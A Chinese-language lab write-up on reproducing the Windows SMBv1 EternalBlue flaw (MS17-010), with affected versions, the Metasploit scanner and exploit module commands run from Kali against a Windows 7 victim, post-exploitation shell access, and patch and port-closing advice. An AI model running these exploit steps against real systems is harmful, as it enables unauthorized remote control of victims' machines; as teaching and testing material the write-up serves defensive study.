Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010)

详细描述

当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时，存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。<来源：http://technet.microsoft.com/security/bulletin/MS17-010>

漏洞原理

通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，通过恶意代码扫描并攻击开放445文件共享端口的Windows主机，只要用户主机在线，即可通过该漏洞，控制用户的主机。包括但不限于窥探窃取用户隐私数据、植入勒索病毒、植入远控木马等

漏洞影响版本

#目前已知受影响的Windows 版本包括但不限于：
WindowsNT
Windows2000
Windows XP
Windows 2003
Windows Vista
Windows 7
Windows 8
Windows 2008
Windows 2008 R2
Windows Server 2012 SP0

环境

攻击机：Kali-Linux-2020.3
受害机：Windows7专业版

漏洞复现

1、启动msf

msfconsole

image.png

2、搜索ms17_010,可以看到文件成功加载

search ms17_010

image.png

3、使用扫描模块（scanner）

use  auxiliary/scanner/smb/smb_ms17_010   // 这个是scanner（扫描）模块，用来扫描判断目标主机是否存在永恒之蓝漏洞的。
set rhost 10.xx.xx.xx //这里的ip填写受害机地址
run

image.png

如发现上图红框：【+】和 Host is likely VULNERABLE to MS17-010!，证明目标主机存在ms17-010漏洞，可以利用
4、使用攻击模块，进行漏洞利用

use exploit/windows/smb/ms17_010_eternalblue //使用攻击模块
set rhost 10.xx.xx.xx //这里的ip填写受害机地址
show options //显示攻击模块的参数
run

image.png

image.png

5、漏洞利用成功，操控受害机

shell
systeminfo

image.png

修复建议

1、关闭135、137、138、139、445等危险端口
2、Microsoft已经为此发布了一个安全公告（MS17-010）以及相应补丁:
MS17-010: Microsoft Windows SMB 服务器安全更新 (4013389).
链接：http://technet.microsoft.com/security/bulletin/MS17-010